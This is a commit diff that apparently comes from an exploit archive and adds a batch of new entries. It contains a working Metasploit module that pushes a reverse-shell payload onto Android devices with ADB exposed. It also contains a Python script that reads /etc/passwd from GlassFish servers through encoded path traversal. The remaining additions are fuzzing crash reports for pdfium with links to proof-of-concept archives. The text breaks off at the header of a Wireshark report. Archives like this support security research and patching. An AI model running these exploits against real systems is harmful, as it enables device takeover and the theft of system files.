DB: 2016-01-27

15 new exploits
2016-01-27 05:03:06 +00:00 · 2016-01-27 05:03:06 +00:00 · 67dd87a6f5
commit 67dd87a6f5
parent 386bdfe50d
16 changed files with 1076 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -35489,6 +35489,7 @@ id,file,description,date,author,platform,type,port
 39238,platforms/php/webapps/39238.txt,"AtomCMS SQL Injection and Arbitrary File Upload Vulnerabilities",2014-07-07,"Jagriti Sahu",php,webapps,0
 39239,platforms/php/webapps/39239.txt,"xClassified 'ads.php' SQL Injection Vulnerability",2014-07-07,Lazmania61,php,webapps,0
 39240,platforms/php/webapps/39240.txt,"WordPress BSK PDF Manager Plugin 'wp-admin/admin.php' Multiple SQL Injection Vulnerabilities",2014-07-09,"Claudio Viviani",php,webapps,0
 39241,platforms/java/webapps/39241.py,"Glassfish Server - Arbitrary File Read Vulnerability",2016-01-15,bingbing,java,webapps,4848
 39242,platforms/windows/dos/39242.py,"NetSchedScan 1.0 - Crash PoC",2016-01-15,"Abraham Espinosa",windows,dos,0
 39243,platforms/php/webapps/39243.txt,"phpDolphin <= 2.0.5 - Multiple Vulnerabilities",2016-01-15,WhiteCollarGroup,php,webapps,80
 39244,platforms/linux/local/39244.txt,"Amanda <= 3.3.1 - amstar Command Injection Local Root",2016-01-15,"Hacker Fantastic",linux,local,0
@ -35517,6 +35518,7 @@ id,file,description,date,author,platform,type,port
 39271,platforms/php/webapps/39271.txt,"CMSimple Default Administrator Credentials",2014-07-28,"Govind Singh",php,webapps,0
 39272,platforms/php/webapps/39272.txt,"CMSimple Remote file Inclusion",2014-07-28,"Govind Singh",php,webapps,0
 39273,platforms/php/webapps/39273.txt,"CMSimple /2author/index.php color Parameter Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0
 39274,platforms/windows/dos/39274.py,"CesarFTP 0.99g - XCWD Denial of Service",2016-01-19,"Irving Aguilar",windows,dos,21
 39275,platforms/windows/dos/39275.txt,"PDF-XChange Viewer 2.5.315.0 - Shading Type 7 Heap Memory Corruption",2016-01-19,"Sébastien Morin",windows,dos,0
 39277,platforms/linux/local/39277.c,"Linux Kernel REFCOUNT Overflow/Use-After-Free in Keyrings",2016-01-19,"Perception Point Team",linux,local,0
 39278,platforms/hardware/remote/39278.txt,"Barracuda Web Application Firewall Authentication Bypass Vulnerability",2014-08-04,"Nick Hayes",hardware,remote,0
@ -35558,3 +35560,16 @@ id,file,description,date,author,platform,type,port
 39316,platforms/hardware/remote/39316.pl,"Multiple Aztech Modem Routers Session Hijacking Vulnerability",2014-09-15,"Eric Fajardo",hardware,remote,0
 39317,platforms/php/webapps/39317.txt,"WordPress Wordfence Security Plugin Multiple Vulnerabilities",2014-09-14,Voxel@Night,php,webapps,0
 39318,platforms/multiple/remote/39318.txt,"Laravel 'Hash::make()' Function Password Truncation Security Weakness",2014-09-16,"Pichaya Morimoto",multiple,remote,0
 39319,platforms/php/webapps/39319.txt,"Wordpress Booking Calendar Contact Form Plugin <=1.1.23 - Shortcode SQL Injection",2016-01-26,"i0akiN SEC-LABORATORY",php,webapps,80
 39320,platforms/php/webapps/39320.txt,"Gongwalker API Manager 1.1 - Blind SQL Injection",2016-01-26,HaHwul,php,webapps,80
 39321,platforms/multiple/dos/39321.txt,"pdfium - opj_jp2_apply_pclr (libopenjpeg) Heap-Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0
 39322,platforms/multiple/dos/39322.txt,"pdfium - opj_j2k_read_mcc (libopenjpeg) Heap-Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0
 39323,platforms/multiple/dos/39323.txt,"Wireshark - iseries_check_file_type Stack-Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0
 39324,platforms/multiple/dos/39324.txt,"Wireshark - dissect_nhdr_extopt Stack-Based Buffer Overflow",2016-01-26,"Google Security Research",multiple,dos,0
 39325,platforms/multiple/dos/39325.txt,"Wireshark - hiqnet_display_data Static Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0
 39326,platforms/multiple/dos/39326.txt,"Wireshark - nettrace_3gpp_32_423_file_open Stack-Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0
 39327,platforms/multiple/dos/39327.txt,"Wireshark dissect_ber_constrained_bitstring Heap-Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0
 39328,platforms/android/remote/39328.rb,"Android ADB Debug Server Remote Payload Execution",2016-01-26,metasploit,android,remote,5555
 39329,platforms/windows/dos/39329.py,"InfraRecorder '.m3u' File Buffer Overflow Vulnerability",2014-05-25,"Osanda Malith",windows,dos,0
 39330,platforms/windows/dos/39330.txt,"Foxit Reader <= 7.2.8.1124 - PDF Parsing Memory Corruption",2016-01-26,"Francis Provencher",windows,dos,0
 39331,platforms/windows/dos/39331.pl,"Tftpd32 and Tftpd64 Denial Of Service Vulnerability",2014-05-14,j0s3h4x0r,windows,dos,0
--- a/platforms/android/remote/39328.rb
+++ b/platforms/android/remote/39328.rb
@ -0,0 +1,85 @@
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 require 'msf/core'
 require 'rex/proto/adb'
 class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Android ADB Debug Server Remote Payload Execution',
      'Description'    => %q{
        Writes and spawns a native payload on an android device that is listening
        for adb debug messages.
      },
      'Author'         => ['joev'],
      'License'        => MSF_LICENSE,
      'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/shell_reverse_tcp' },
      'Platform'       => 'linux',
      'Arch'           => [ARCH_ARMLE, ARCH_X86, ARCH_X86_64, ARCH_MIPSLE],
      'Targets'        => [
        ['armle',  {'Arch' => ARCH_ARMLE}],
        ['x86',    {'Arch' => ARCH_X86}],
        ['x64',    {'Arch' => ARCH_X86_64}],
        ['mipsle', {'Arch' => ARCH_MIPSLE}]
      ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jan 01 2016'
    ))
    register_options([
      Opt::RPORT(5555),
      OptString.new('WritableDir', [true, 'Writable directory', '/data/local/tmp/'])
    ], self.class)
  end
  def check
    setup_adb_connection do
      device_info = @adb_client.connect.data
      print_good "Detected device:\n#{device_info}"
      return Exploit::CheckCode::Vulnerable
    end
    Exploit::CheckCode::Unknown
  end
  def execute_command(cmd, opts)
    response = @adb_client.exec_cmd(cmd)
    print_good "Command executed, response:\n #{response}"
  end
  def exploit
    setup_adb_connection do
      device_data = @adb_client.connect
      print_good "Connected to device:\n#{device_data.data}"
      execute_cmdstager({
        flavor: :echo,
        enc_format: :octal,
        prefix: '\\\\0',
        temp: datastore['WritableDir'],
        linemax: Rex::Proto::ADB::Message::Connect::DEFAULT_MAXDATA-8,
        background: true,
        nodelete: true
      })
    end
  end
  def setup_adb_connection(&blk)
    begin
      print_status "Connecting to device..."
      connect
      @adb_client = Rex::Proto::ADB::Client.new(sock)
      blk.call
    ensure
      disconnect
    end
  end
 end
--- a/platforms/java/webapps/39241.py
+++ b/platforms/java/webapps/39241.py
@ -0,0 +1,13 @@
 # Title: glassfish Arbitrary file read vulnerability
 # Date : 01/15/2016
 # Author: bingbing
 # Software link: https://glassfish.java.net/download.html
 # Software: GlassFish Server
 # Tested: Windows 7 SP1 64bits
 #!/usr/bin/python
 import urllib2
 response=urllib2.urlopen('http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd')
 s=response.read()
 print s
--- a/platforms/multiple/dos/39321.txt
+++ b/platforms/multiple/dos/39321.txt
@ -0,0 +1,103 @@
 Source: https://code.google.com/p/google-security-research/issues/detail?id=626
 The following crash was encountered in pdfium (the Chrome PDF renderer) during PDF fuzzing:
 --- cut ---
 ==9326==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6250001bf680 at pc 0x000000892375 bp 0x7ffca7393ea0 sp 0x7ffca7393e98
 READ of size 4 at 0x6250001bf680 thread T0
    #0 0x892374 in opj_jp2_apply_pclr third_party/pdfium/third_party/libopenjpeg20/jp2.c:1018:18
    #1 0x88d536 in opj_jp2_decode third_party/pdfium/third_party/libopenjpeg20/jp2.c:1512:5
    #2 0x8580f6 in opj_decode third_party/pdfium/third_party/libopenjpeg20/openjpeg.c:412:10
    #3 0x5d8c02 in CJPX_Decoder::Init(unsigned char const*, unsigned int) third_party/pdfium/core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:742:11
    #4 0x5dc7d0 in CCodec_JpxModule::CreateDecoder(unsigned char const*, unsigned int, bool) third_party/pdfium/core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:866:10
    #5 0xb9909c in decoder third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:75:36
    #6 0xb9909c in CPDF_DIBSource::LoadJpxBitmap() third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:698
    #7 0xb917d3 in CPDF_DIBSource::CreateDecoder() third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:645:5
    #8 0xb8c8af in CPDF_DIBSource::StartLoadDIBSource(CPDF_Document*, CPDF_Stream const*, int, CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:365:13
    #9 0xb75b33 in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:308:7
    #10 0xb75693 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:143:13
    #11 0xba9823 in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1561:11
    #12 0xbaa67e in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1639:17
    #13 0xb7d368 in CPDF_ImageRenderer::StartLoadDIBSource() third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:337:7
    #14 0xb77897 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:484:7
    #15 0xb64fb6 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render.cpp:320:10
    #16 0xb70a25 in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1152:13
    #17 0xb6f633 in CPDF_ProgressiveRenderer::Start(IFX_Pause*) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1090:3
    #18 0x52c1f1 in FPDF_RenderPage_Retail(CRenderContext*, void*, int, int, int, int, int, int, int, IFSDK_PAUSE_Adapter*) third_party/pdfium/fpdfsdk/src/fpdfview.cpp:752:3
    #19 0x52b7fb in FPDF_RenderPageBitmap third_party/pdfium/fpdfsdk/src/fpdfview.cpp:507:3
    #20 0x4dae22 in RenderPage(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, void* const&, void* const&, int, Options const&) third_party/pdfium/samples/pdfium_test.cc:363:3
    #21 0x4dd558 in RenderPdf(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, char const*, unsigned long, Options const&) third_party/pdfium/samples/pdfium_test.cc:520:9
    #22 0x4de3d1 in main third_party/pdfium/samples/pdfium_test.cc:597:5
 0x6250001bf680 is located 0 bytes to the right of 9600-byte region [0x6250001bd100,0x6250001bf680)
 allocated by thread T0 here:
    #0 0x4b0154 in __interceptor_calloc
    #1 0x88219f in opj_j2k_update_image_data third_party/pdfium/third_party/libopenjpeg20/j2k.c:8157:57
    #2 0x8817d7 in opj_j2k_decode_tiles third_party/pdfium/third_party/libopenjpeg20/j2k.c:9603:23
    #3 0x869d57 in opj_j2k_exec third_party/pdfium/third_party/libopenjpeg20/j2k.c:7286:41
    #4 0x869d57 in opj_j2k_decode third_party/pdfium/third_party/libopenjpeg20/j2k.c:9796
    #5 0x88d234 in opj_jp2_decode third_party/pdfium/third_party/libopenjpeg20/jp2.c:1483:8
    #6 0x8580f6 in opj_decode third_party/pdfium/third_party/libopenjpeg20/openjpeg.c:412:10
    #7 0x5d8c02 in CJPX_Decoder::Init(unsigned char const*, unsigned int) third_party/pdfium/core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:742:11
    #8 0x5dc7d0 in CCodec_JpxModule::CreateDecoder(unsigned char const*, unsigned int, bool) third_party/pdfium/core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:866:10
    #9 0xb9909c in decoder third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:75:36
    #10 0xb9909c in CPDF_DIBSource::LoadJpxBitmap() third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:698
    #11 0xb917d3 in CPDF_DIBSource::CreateDecoder() third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:645:5
    #12 0xb8c8af in CPDF_DIBSource::StartLoadDIBSource(CPDF_Document*, CPDF_Stream const*, int, CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:365:13
    #13 0xb75b33 in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:308:7
    #14 0xb75693 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:143:13
    #15 0xba9823 in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1561:11
    #16 0xbaa67e in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1639:17
    #17 0xb7d368 in CPDF_ImageRenderer::StartLoadDIBSource() third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:337:7
    #18 0xb77897 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:484:7
    #19 0xb64fb6 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render.cpp:320:10
    #20 0xb70a25 in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1152:13
    #21 0xb6f633 in CPDF_ProgressiveRenderer::Start(IFX_Pause*) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1090:3
    #22 0x52c1f1 in FPDF_RenderPage_Retail(CRenderContext*, void*, int, int, int, int, int, int, int, IFSDK_PAUSE_Adapter*) third_party/pdfium/fpdfsdk/src/fpdfview.cpp:752:3
    #23 0x52b7fb in FPDF_RenderPageBitmap third_party/pdfium/fpdfsdk/src/fpdfview.cpp:507:3
    #24 0x4dae22 in RenderPage(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, void* const&, void* const&, int, Options const&) third_party/pdfium/samples/pdfium_test.cc:363:3
    #25 0x4dd558 in RenderPdf(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, char const*, unsigned long, Options const&) third_party/pdfium/samples/pdfium_test.cc:520:9
    #26 0x4de3d1 in main third_party/pdfium/samples/pdfium_test.cc:597:5
 SUMMARY: AddressSanitizer: heap-buffer-overflow (pdfium_test+0x892374)
 Shadow bytes around the buggy address:
  0x0c4a8002fe80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a8002fe90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a8002fea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a8002feb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a8002fec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 =>0x0c4a8002fed0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a8002fee0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a8002fef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a8002ff00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a8002ff10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a8002ff20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
 ==9326==ABORTING
 --- cut ---
 The crash was reported at https://code.google.com/p/chromium/issues/detail?id=554172. Attached is a PDF file which triggers the crash.
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39321.zip
--- a/platforms/multiple/dos/39322.txt
+++ b/platforms/multiple/dos/39322.txt
@ -0,0 +1,109 @@
 Source: https://code.google.com/p/google-security-research/issues/detail?id=624
 The following crash was encountered in pdfium (the Chrome PDF renderer) during PDF fuzzing:
 --- cut ---
 $ ./pdfium_test asan_heap-oob_91e21c_3386_e3df547c206840ceb03fd7c7ca823e7a 
 Rendering PDF file asan_heap-oob_91e21c_3386_e3df547c206840ceb03fd7c7ca823e7a.
 Non-linearized path...
 =================================================================
 ==28048==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61200000b400 at pc 0x000000a91f64 bp 0x7fffdebdb0f0 sp 0x7fffdebdb0e8
 READ of size 4 at 0x61200000b400 thread T0
    #0 0xa91f63 in opj_j2k_read_mcc third_party/libopenjpeg20/j2k.c:5378:35
    #1 0xa77265 in opj_j2k_read_header_procedure third_party/libopenjpeg20/j2k.c:7213:23
    #2 0xa51e2c in opj_j2k_exec third_party/libopenjpeg20/j2k.c:7286:41
    #3 0xa51467 in opj_j2k_read_header third_party/libopenjpeg20/j2k.c:6764:15
    #4 0xac643f in opj_jp2_read_header third_party/libopenjpeg20/jp2.c:2648:9
    #5 0xa39a8d in opj_read_header third_party/libopenjpeg20/openjpeg.c:391:10
    #6 0x7863ca in CJPX_Decoder::Init(unsigned char const*, unsigned int) core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:729:8
    #7 0x78b63c in CCodec_JpxModule::CreateDecoder(unsigned char const*, unsigned int, bool) core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:866:10
    #8 0xec1c9b in CPDF_DIBSource::LoadJpxBitmap() core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:689:24
    #9 0xeb8296 in CPDF_DIBSource::CreateDecoder() core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:645:5
    #10 0xeb0cf9 in CPDF_DIBSource::StartLoadDIBSource(CPDF_Document*, CPDF_Stream const*, int, CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:365:13
    #11 0xe8a295 in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:308:7
    #12 0xe89a99 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:143:13
    #13 0xed4f7e in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1561:11
    #14 0xed6aaf in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1639:17
    #15 0xe96f16 in CPDF_ImageRenderer::StartLoadDIBSource() core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:337:7
    #16 0xe8db49 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:484:7
    #17 0xe67c11 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:320:10
    #18 0xe76f12 in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1152:13
    #19 0xe756c1 in CPDF_ProgressiveRenderer::Start(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1090:3
    #20 0x63dbd7 in FPDF_RenderPage_Retail(CRenderContext*, void*, int, int, int, int, int, int, int, IFSDK_PAUSE_Adapter*) fpdfsdk/src/fpdfview.cpp:752:3
    #21 0x63c3af in FPDF_RenderPageBitmap fpdfsdk/src/fpdfview.cpp:507:3
    #22 0x4ee0df in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:374:3
    #23 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9
    #24 0x4f16e9 in main samples/pdfium_test.cc:608:5
 0x61200000b400 is located 0 bytes to the right of 320-byte region [0x61200000b2c0,0x61200000b400)
 allocated by thread T0 here:
    #0 0x4be96c in calloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:56
    #1 0xa8b0b3 in opj_j2k_read_siz third_party/libopenjpeg20/j2k.c:2262:25
    #2 0xa77265 in opj_j2k_read_header_procedure third_party/libopenjpeg20/j2k.c:7213:23
    #3 0xa51e2c in opj_j2k_exec third_party/libopenjpeg20/j2k.c:7286:41
    #4 0xa51467 in opj_j2k_read_header third_party/libopenjpeg20/j2k.c:6764:15
    #5 0xac643f in opj_jp2_read_header third_party/libopenjpeg20/jp2.c:2648:9
    #6 0xa39a8d in opj_read_header third_party/libopenjpeg20/openjpeg.c:391:10
    #7 0x7863ca in CJPX_Decoder::Init(unsigned char const*, unsigned int) core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:729:8
    #8 0x78b63c in CCodec_JpxModule::CreateDecoder(unsigned char const*, unsigned int, bool) core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:866:10
    #9 0xec1c9b in CPDF_DIBSource::LoadJpxBitmap() core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:689:24
    #10 0xeb8296 in CPDF_DIBSource::CreateDecoder() core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:645:5
    #11 0xeb0cf9 in CPDF_DIBSource::StartLoadDIBSource(CPDF_Document*, CPDF_Stream const*, int, CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:365:13
    #12 0xe8a295 in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:308:7
    #13 0xe89a99 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:143:13
    #14 0xed4f7e in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1561:11
    #15 0xed6aaf in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1639:17
    #16 0xe96f16 in CPDF_ImageRenderer::StartLoadDIBSource() core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:337:7
    #17 0xe8db49 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:484:7
    #18 0xe67c11 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:320:10
    #19 0xe76f12 in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1152:13
    #20 0xe756c1 in CPDF_ProgressiveRenderer::Start(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1090:3
    #21 0x63dbd7 in FPDF_RenderPage_Retail(CRenderContext*, void*, int, int, int, int, int, int, int, IFSDK_PAUSE_Adapter*) fpdfsdk/src/fpdfview.cpp:752:3
    #22 0x63c3af in FPDF_RenderPageBitmap fpdfsdk/src/fpdfview.cpp:507:3
    #23 0x4ee0df in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:374:3
    #24 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9
    #25 0x4f16e9 in main samples/pdfium_test.cc:608:5
 SUMMARY: AddressSanitizer: heap-buffer-overflow third_party/libopenjpeg20/j2k.c:5378:35 in opj_j2k_read_mcc
 Shadow bytes around the buggy address:
  0x0c247fff9630: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff9640: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff9650: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c247fff9660: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c247fff9670: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 =>0x0c247fff9680:[fa]fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c247fff9690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c247fff96a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c247fff96b0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c247fff96c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c247fff96d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa fa
 Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
 ==28048==ABORTING
 --- cut ---
 The crash was reported at https://code.google.com/p/chromium/issues/detail?id=554129. Attached are two PDF files which trigger the crash.
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39322.zip
--- a/platforms/multiple/dos/39323.txt
+++ b/platforms/multiple/dos/39323.txt
@ -0,0 +1,65 @@
 Source: https://code.google.com/p/google-security-research/issues/detail?id=697
